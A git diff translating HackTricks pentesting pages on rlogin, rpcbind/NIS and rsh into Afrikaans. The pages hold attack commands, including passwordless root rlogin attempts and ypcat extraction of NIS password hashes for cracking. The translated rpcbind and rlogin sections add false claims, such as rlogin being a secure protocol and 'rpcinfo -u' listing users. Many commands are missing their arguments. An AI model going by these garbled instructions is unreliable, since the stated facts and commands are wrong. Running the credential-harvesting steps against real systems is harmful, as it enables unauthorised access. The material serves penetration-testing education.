-**Instantly available setup for vulnerability assessment & penetration testing**. Run a full pentest from anywhere with 20+ tools & features that go from recon to reporting. We don't replace pentesters - we develop custom tools, detection & exploitation modules to give them back some time to dig deeper, pop shells, and have fun.
+**Onmiddellik beskikbare opset vir kwesbaarheidsassessering en penetrasietoetsing**. Voer 'n volledige penetrasietoets uit van enige plek met 20+ gereedskap en funksies wat strek van rekognisering tot verslagdoening. Ons vervang nie penetrasietoetsers nie - ons ontwikkel aangepaste gereedskap, opsporings- en uitbuitingsmodules om hulle tyd te gee om dieper te graaf, skulpe te kraak en pret te hê.
 
 {% embed url="https://pentest-tools.com/" %}
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslagplekke.
 
 

diff --git a/network-services-pentesting/pentesting-rlogin.md b/network-services-pentesting/pentesting-rlogin.md
index 57b7ad207..9e9487368 100644
--- a/network-services-pentesting/pentesting-rlogin.md
+++ b/network-services-pentesting/pentesting-rlogin.md
@@ -2,60 +2,68 @@
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

 
-## Basic Information
+## Basiese Inligting
 
-In the past, **rlogin** was widely utilized for remote administration tasks. However, due to concerns regarding its security, it has largely been superseded by **slogin** and **ssh**. These newer methods provide enhanced security for remote connections.
-
-**Default port:** 513
+In die verlede is **rlogin** wyd gebruik vir afstandsadministrasietake. Tans is dit egter grootliks vervang deur **slogin** en **ssh** as gevolg van bekommernisse oor veiligheid. Hierdie nuwer metodes bied verbeterde veiligheid vir afstandsverbindinge.
 
+**Verstekpoort:** 513
 ```
 PORT    STATE SERVICE
 513/tcp open  login
 ```
+## **Aanteken**
 
-## **Login**
+Rlogin is 'n netwerkprotokol wat gebruik word om 'n veilige verbinding tussen 'n klient en 'n bediener tot stand te bring. Dit maak gebruik van 'n gebruikersnaam en wagwoord vir verifikasie. Hier is 'n paar belangrike punte om in gedagte te hou wanneer jy rlogin pentesting uitvoer:
 
+- **Rhosts-lêer**: Rlogin maak gebruik van 'n lêer genaamd "rhosts" om vertroue tussen bedieners te vestig. Hierdie lêer bevat 'n lys van vertroude bedieners en die gebruikers wat toegang tot daardie bedieners het. Dit is belangrik om te kyk na die inhoud van hierdie lêer, aangesien dit 'n potensiële veiligheidsrisiko kan wees as dit nie behoorlik gekonfigureer is nie.
+
+- **Verifikasie**: Rlogin maak gebruik van 'n gebruikersnaam en wagwoord vir verifikasie. Dit is belangrik om swak wagwoorde te identifiseer en te verhoed dat aanvallers toegang tot die stelsel verkry deur middel van gekraakte wagwoorde.
+
+- **Man-in-die-middel-aanvalle**: Rlogin is vatbaar vir man-in-die-middel-aanvalle, waar 'n aanvaller die kommunikasie tussen die klient en die bediener kan onderskep en selfs wysig. Dit is belangrik om die kommunikasie te verseker deur middel van versleuteling of om alternatiewe protokolle te gebruik wat veiliger is.
+
+- **Bruteforce-aanvalle**: Aanvallers kan bruteforce-aanvalle uitvoer om toegang tot 'n rlogin-stelsel te verkry deur verskeie wagwoorde te probeer. Dit is belangrik om sterk wagwoorde te gebruik en om maatreëls te tref om bruteforce-aanvalle te voorkom, soos die instelling van wagwoordvergrendeling of die gebruik van tweefaktorverifikasie.
+
+- **Sessiehantering**: Rlogin maak gebruik van sessies om die kommunikasie tussen die klient en die bediener te bestuur. Dit is belangrik om die sessiehantering te bestudeer en te verstaan, aangesien dit 'n potensiële aanvalsoppervlak kan wees.
+
+- **Verwante protokolle**: Rlogin is verwant aan ander protokolle soos rsh (remote shell) en rexec (remote execution). Dit is belangrik om die verwantskappe tussen hierdie protokolle te verstaan en om hul veiligheidsimplikasies te ondersoek.
+
+Deur hierdie punte in gedagte te hou en deur die nodige pentesting-tegnieke toe te pas, kan jy die veiligheid van 'n rlogin-stelsel ondersoek en verbeter.
 ```bash
 # Install client
 apt-get install rsh-client
 ```
-
-You can use the following command to try to **login** to a remote host where **no password** is required for access. Try using **root** is as username:
-
+Jy kan die volgende bevel gebruik om te probeer om na 'n afgeleë gasheer in te teken waar geen wagwoord vereis word vir toegang nie. Probeer om die gebruikersnaam **root** te gebruik:
 ```bash
 rlogin  -l 
 ```
-
 ### [Brute force](../generic-methodologies-and-resources/brute-force.md#rlogin)
 
-## Find files
-
+## Vind lêers
 ```
 find / -name .rhosts
 ```
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

diff --git a/network-services-pentesting/pentesting-rpcbind.md b/network-services-pentesting/pentesting-rpcbind.md
index bb3cc4524..12a59a1f2 100644
--- a/network-services-pentesting/pentesting-rpcbind.md
+++ b/network-services-pentesting/pentesting-rpcbind.md
@@ -2,37 +2,83 @@
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

 
-## Basic Information
+## Basiese Inligting
 
-**Portmapper** is a service that is utilized for mapping network service ports to **RPC** (Remote Procedure Call) program numbers. It acts as a critical component in **Unix-based systems**, facilitating the exchange of information between these systems. The **port** associated with **Portmapper** is frequently scanned by attackers as it can reveal valuable information. This information includes the type of **Unix Operating System (OS)** running and details about the services that are available on the system. Additionally, **Portmapper** is commonly used in conjunction with **NFS (Network File System)**, **NIS (Network Information Service)**, and other **RPC-based services** to manage network services effectively.
-
-**Default port:** 111/TCP/UDP, 32771 in Oracle Solaris
+**Portmapper** is 'n diens wat gebruik word om netwerkdienste-poorte na **RPC** (Remote Procedure Call) programnommers te karteer. Dit tree op as 'n kritieke komponent in **Unix-gebaseerde stelsels** en fasiliteer die uitruil van inligting tussen hierdie stelsels. Die **poort** wat met **Portmapper** geassosieer word, word gereeld deur aanvallers geskandeer, aangesien dit waardevolle inligting kan onthul. Hierdie inligting sluit in die tipe **Unix-bedryfstelsel (OS)** wat gebruik word en besonderhede oor die dienste wat beskikbaar is op die stelsel. Daarbenewens word **Portmapper** dikwels saam met **NFS (Network File System)**, **NIS (Network Information Service)** en ander **RPC-gebaseerde dienste** gebruik om netwerkdienste doeltreffend te bestuur.
 
+**Verstekpoort:** 111/TCP/UDP, 32771 in Oracle Solaris
 ```
 PORT    STATE SERVICE
 111/tcp open  rpcbind
 ```
+## Opname
 
-## Enumeration
+RPCbind is 'n diens wat gebruik word om RPC-programme te registreer en te vind op 'n netwerk. Dit is 'n belangrike diens vir die kommunikasie tussen verskillende programme op 'n netwerk. Tydens 'n pentest kan die opname van RPCbind help om potensiële aanvalsoppervlaktes te identifiseer en te verken.
 
+### Port Skandering
+
+Die standaardpoort vir RPCbind is 111. Dit is belangrik om hierdie poort te skandeer om te bepaal of die diens beskikbaar is op die teikenstelsel.
+
+### RPCbind-inligting opvraag
+
+Om inligting oor die RPCbind-diens op te vra, kan die volgende opdrag gebruik word:
+
+```plaintext
+rpcinfo -p 
+```
+
+Hierdie opdrag sal 'n lys van geregistreerde RPC-programme op die teikenstelsel gee, tesame met die poorte waarop hulle beskikbaar is.
+
+### RPCbind-poorte skandering
+
+Om die RPC-programme wat deur RPCbind geregistreer is, te skandeer, kan die volgende opdrag gebruik word:
+
+```plaintext
+nmap -p  --script rpcinfo 
+```
+
+Hierdie opdrag sal die RPC-programme identifiseer wat deur RPCbind geregistreer is en beskikbaar is op die opgegee poorte.
+
+### RPCbind-verbindingsondersoek
+
+Om te bepaal watter programme verbind met RPCbind, kan die volgende opdrag gebruik word:
+
+```plaintext
+rpcbind -l
+```
+
+Hierdie opdrag sal 'n lys van aktiewe verbindings na RPCbind gee, tesame met die programme wat daarmee verbind is.
+
+### RPCbind-gebruikersondersoek
+
+Om te bepaal watter gebruikers RPCbind gebruik, kan die volgende opdrag gebruik word:
+
+```plaintext
+rpcinfo -u 
+```
+
+Hierdie opdrag sal 'n lys van gebruikers toon wat RPCbind gebruik op die teikenstelsel.
+
+### RPCbind-veiligheidskwessies
+
+RPCbind kan sekuriteitskwessies veroorsaak as dit nie behoorlik geconfigureer is nie. Dit kan lei tot blootstelling van gevoelige inligting of selfs die uitvoering van aanvalle. Dit is belangrik om RPCbind te evalueer en te verseker dat dit behoorlik beveilig is op die teikenstelsel.
 ```
 rpcinfo irked.htb
 nmap -sSUC -p111 192.168.10.1
 ```
-
-Sometimes it doesn't give you any information, in other occasions you will get something like this:
+Soms gee dit jou geen inligting nie, in ander gevalle sal jy iets soos hierdie kry:
 
 ![](<../.gitbook/assets/image (230).png>)
 
@@ -42,23 +88,21 @@ Sometimes it doesn't give you any information, in other occasions you will get s
 
 ## RPCBind + NFS
 
-If you find the service NFS then probably you will be able to list and download(and maybe upload) files:
+As jy die diens NFS vind, sal jy waarskynlik in staat wees om lêers te lys en af te laai (en miskien op te laai):
 
 ![](<../.gitbook/assets/image (232).png>)
 
-Read[ 2049 - Pentesting NFS service](nfs-service-pentesting.md) to learn more about how to test this protocol.
+Lees [2049 - Pentesting NFS-diens](nfs-service-pentesting.md) om meer te wete te kom oor hoe om hierdie protokol te toets.
 
 ## NIS
 
-Exploring **NIS** vulnerabilities involves a two-step process, starting with the identification of the service `ypbind`. The cornerstone of this exploration is uncovering the **NIS domain name**, without which progress is halted.
+Die verkenning van **NIS** kwesbaarhede behels 'n tweestapproses, wat begin met die identifikasie van die diens `ypbind`. Die hoeksteen van hierdie verkenning is om die **NIS-domeinnaam** te ontdek, sonder die vordering tot stilstand kom.
 
 ![](<../.gitbook/assets/image (233).png>)
 
+Die verkenningstog begin met die installering van nodige pakkette (`apt-get install nis`). Die volgende stap vereis die gebruik van `ypwhich` om die teenwoordigheid van die NIS-bediener te bevestig deur dit te ping met die domeinnaam en bediener IP, waarby hierdie elemente geanonimiseer moet word vir sekuriteit.
 
-The exploration journey begins with the installation of necessary packages (`apt-get install nis`). The subsequent step requires using `ypwhich` to confirm the NIS server's presence by pinging it with the domain name and server IP, ensuring these elements are anonymized for security.
-
-The final and crucial step involves the `ypcat` command to extract sensitive data, particularly encrypted user passwords. These hashes, once cracked using tools like **John the Ripper**, reveal insights into system access and privileges.
-
+Die finale en kritieke stap behels die gebruik van die `ypcat`-opdrag om sensitiewe data te onttrek, veral versleutelde gebruikerswagwoorde. Hierdie hasings, sodra dit gekraak is met behulp van hulpmiddels soos **John the Ripper**, onthul insigte in stelseltoegang en voorregte.
 ```bash
 # Install NIS tools
 apt-get install nis
@@ -67,73 +111,69 @@ ypwhich -d  
 # Extract user credentials
 ypcat –d  –h  passwd.byname
 ```
+### NIF-lêers
 
-### NIF files
+| **Meesterlêer** | **Kaart(e)**                 | **Notas**                            |
+| --------------- | ---------------------------- | ------------------------------------ |
+| /etc/hosts      | hosts.byname, hosts.byaddr   | Bevat gasheernommers en IP-inligting |
+| /etc/passwd     | passwd.byname, passwd.byuid  | NIS-gebruikerswagwoordlêer           |
+| /etc/group      | group.byname, group.bygid    | NIS-groepslêer                       |
+| /usr/lib/aliases| mail.aliases                 | Besonderhede van posaliases           |
 
-| **Master file**  | **Map(s)**                  | **Notes**                         |
-| ---------------- | --------------------------- | --------------------------------- |
-| /etc/hosts       | hosts.byname, hosts.byaddr  | Contains hostnames and IP details |
-| /etc/passwd      | passwd.byname, passwd.byuid | NIS user password file            |
-| /etc/group       | group.byname, group.bygid   | NIS group file                    |
-| /usr/lib/aliases | mail.aliases                | Details mail aliases              |
+## RPC-gebruikers
 
-## RPC Users
-
-If you find the **rusersd** service listed like this:
+As jy die **rusersd**-diens soos hier gelys vind:
 
 ![](<../.gitbook/assets/image (231).png>)
 
-You could enumerate users of the box. To learn how read [1026 - Pentesting Rsusersd](1026-pentesting-rusersd.md).
+Kan jy gebruikers van die boks opnoem. Lees [1026 - Pentesting Rsusersd](1026-pentesting-rusersd.md) om te leer hoe.
 
-## Bypass Filtered Portmapper port
-
-When conducting a **nmap scan** and discovering open NFS ports with port 111 being filtered, direct exploitation of these ports is not feasible. However, by **simulating a portmapper service locally and creating a tunnel from your machine** to the target, exploitation becomes possible using standard tools. This technique allows for bypassing the filtered state of port 111, thus enabling access to NFS services. For detailed guidance on this method, refer to the article available at [this link](https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc).
+## Om die gefiltreerde Portmapper-poort te omseil
 
+Wanneer jy 'n **nmap-scan** uitvoer en oop NFS-poorte met poort 111 wat gefiltreer word, is direkte uitbuiting van hierdie poorte nie moontlik nie. Deur egter **lokale simulasie van 'n portmapper-diens te skep en 'n tonnel van jou masjien na die teiken te skep**, word uitbuiting moontlik met behulp van standaardgereedskap. Hierdie tegniek maak dit moontlik om die gefiltreerde toestand van poort 111 te omseil en dus toegang tot NFS-dienste te verkry. Vir gedetailleerde leiding oor hierdie metode, raadpleeg die artikel beskikbaar by [hierdie skakel](https://medium.com/@sebnemK/how-to-bypass-filtered-portmapper-port-111-27cee52416bc).
 
 ## Shodan
 
 * `Portmap`
 
-## Labs to practice
+## Oefenlaboratoriums
 
-* Practice these techniques in the [**Irked HTB machine**](https://app.hackthebox.com/machines/Irked).
-
-## HackTricks Automatic Commands
+* Oefen hierdie tegnieke in die [**Irked HTB-masjien**](https://app.hackthebox.com/machines/Irked).
 
+## HackTricks Outomatiese Opdragte
 ```
 Protocol_Name: Portmapper    #Protocol Abbreviation if there is one.
 Port_Number:  43     #Comma separated if there is more than one.
 Protocol_Description: PM or RPCBind        #Protocol Abbreviation Spelled out
 
 Entry_1:
-  Name: Notes
-  Description: Notes for PortMapper
-  Note: |
-    Portmapper is a service that is utilized for mapping network service ports to RPC (Remote Procedure Call) program numbers. It acts as a critical component in Unix-based systems, facilitating the exchange of information between these systems. The port associated with Portmapper is frequently scanned by attackers as it can reveal valuable information. This information includes the type of Unix Operating System (OS) running and details about the services that are available on the system. Additionally, Portmapper is commonly used in conjunction with NFS (Network File System), NIS (Network Information Service), and other RPC-based services to manage network services effectively.
+Name: Notes
+Description: Notes for PortMapper
+Note: |
+Portmapper is a service that is utilized for mapping network service ports to RPC (Remote Procedure Call) program numbers. It acts as a critical component in Unix-based systems, facilitating the exchange of information between these systems. The port associated with Portmapper is frequently scanned by attackers as it can reveal valuable information. This information includes the type of Unix Operating System (OS) running and details about the services that are available on the system. Additionally, Portmapper is commonly used in conjunction with NFS (Network File System), NIS (Network Information Service), and other RPC-based services to manage network services effectively.
 
-    https://book.hacktricks.xyz/pentesting/pentesting-rpcbind
+https://book.hacktricks.xyz/pentesting/pentesting-rpcbind
 
 Entry_2:
-  Name: rpc info
-  Description: May give netstat-type info
-  Command: whois -h {IP} -p 43 {Domain_Name} && echo {Domain_Name} | nc -vn {IP} 43
+Name: rpc info
+Description: May give netstat-type info
+Command: whois -h {IP} -p 43 {Domain_Name} && echo {Domain_Name} | nc -vn {IP} 43
 
 Entry_3:
-  Name: nmap
-  Description: May give netstat-type info
-  Command: nmap -sSUC -p 111 {IP}
+Name: nmap
+Description: May give netstat-type info
+Command: nmap -sSUC -p 111 {IP}
 ```
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
 
 

diff --git a/network-services-pentesting/pentesting-rsh.md b/network-services-pentesting/pentesting-rsh.md
index 578f03589..666f65e21 100644
--- a/network-services-pentesting/pentesting-rsh.md
+++ b/network-services-pentesting/pentesting-rsh.md
@@ -2,50 +2,48 @@
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

 
-## Basic Information
+## Basiese Inligting
 
-For authentication, **.rhosts** files along with **/etc/hosts.equiv** were utilized by **Rsh**. Authentication was dependent on IP addresses and the Domain Name System (DNS). The ease of spoofing IP addresses, notably on the local network, was a significant vulnerability.
+Vir outentifikasie is **.rhosts**-lêers saam met **/etc/hosts.equiv** gebruik deur **Rsh**. Outentifikasie was afhanklik van IP-adresse en die Domain Name System (DNS). Die maklikheid van IP-adresvervalsing, veral op die plaaslike netwerk, was 'n beduidende kwesbaarheid.
 
-Moreover, it was common for the **.rhosts** files to be placed within the home directories of users, which were often located on Network File System (NFS) volumes.
+Verder was dit algemeen dat die **.rhosts**-lêers binne die tuisgids van gebruikers geplaas is, wat dikwels op Network File System (NFS)-volumes geleë was.
 
-**Default port**: 514
-
-## Login
+**Verstekpoort**: 514
 
+## Aanteken
 ```
 rsh  
 rsh  -l domain\user 
 rsh domain/user@ 
 rsh domain\\user@ 
 ```
-
 ### [**Brute Force**](../generic-methodologies-and-resources/brute-force.md#rsh)
 
-## References
+## Verwysings
 * [https://www.ssh.com/ssh/rsh](https://www.ssh.com/ssh/rsh)
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
-* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
+* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
+* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
+* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
+* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
 
 

diff --git a/network-services-pentesting/pentesting-sap.md b/network-services-pentesting/pentesting-sap.md
index 100a1a081..e3251f6d4 100644
--- a/network-services-pentesting/pentesting-sap.md
+++ b/network-services-pentesting/pentesting-sap.md
@@ -1,42 +1,39 @@
-
-
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
-* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
